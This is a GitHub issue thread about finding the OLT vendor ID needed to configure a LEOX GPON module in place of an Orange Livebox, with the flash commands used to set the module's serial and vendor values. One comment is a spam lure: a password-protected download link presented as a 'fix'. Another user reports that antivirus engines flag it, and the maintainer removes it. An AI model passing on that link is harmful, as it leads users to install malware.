### ISSUE TITLE
OLT VENDOR ID ALRT?

### ISSUE THREAD

**Issue by brookesy2** [StephanGR/gobox#10]
Désolé, mon français est très mauvais. Tout d'abord merci d'avoir créé cet outil ! 

J'ai un LEOX LXT-010S-H en route, mais je ne trouve qu'un identifiant ALRT, qui, selon l'application, est inconnu. Des idées ?

Merci!

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iMord0** [comment]
@brookesy2 do not download that file, I have scanned it with some AV engines and it has high detection rate on virustotal and Bitdefender Premium flags it as Gen:Heur.Mint.Zard.25

But regarding your issue try settings from HWTC that's like a baseline, you may need more parameters, unfortunately I don't have data about ALRT to help you out.

**Comment by Stoufiler** [comment]
Hello @brookesy2 you can speek in english of course :)

To find the list of ONU Vendor ID, I use this website : https://hack-gpon.org/vendor/

Like @iMord0 I don't know which vendor is it so i cannot help you 

Thanks a lot @iMord0 for checking the file sent by a spammer, I've removed the comment

**Comment by brookesy2** [comment]
Oh I most definitely wasn’t going to touch that file, never fear :)

I will try that site shortly and report back!

Thank you both for the quick response!!

**Comment by brookesy2** [comment]
Arcadyan is the Vendor. Unfortunately not on the site :( I guess I have some googling in my future!

```
9.10 | Equipment ID                           ArcadyanLBFIBREOFR
9.11 | Vendor ID                                  ARLT
9.12 | Vendor Product Code              1 

```

**Comment by brookesy2** [comment]
Based on your very useful guide, I may not need it? (DHCP option 60?) From livebox 6 UI I can pull the following values directly. Is it required for any of the UDMP SE settings?

GPON_SN = 9.8 Serial Number
PON_VENDOR_ID = 9.11 Vendor ID
HW_HWVER = 9.9 Hardware Version
OMCI_SW_VER1 = 9.15 ONT Software Version 0
OMCI_SW_VER2 = 9.16 ONT Software Version 1



```
===========LEOX GPON COMMAND=============
flash set GPON_PLOAM_PASSWD DEFAULT012
flash set OMCI_TM_OPT 0
flash set OMCI_OLT_MODE 1
flash set GPON_SN XXXXXXXXXXXX
flash set PON_VENDOR_ID SMBS
flash set HW_HWVER XXXXXXXXXXXX
flash set OMCI_SW_VER1 XXXXXXXXXXXXX
flash set OMCI_SW_VER2 XXXXXXXXXXXXX
=========================================
```

**Comment by brookesy2** [comment]
@iMord0 Apologies, I missed your comment. I will try HWTC also :)
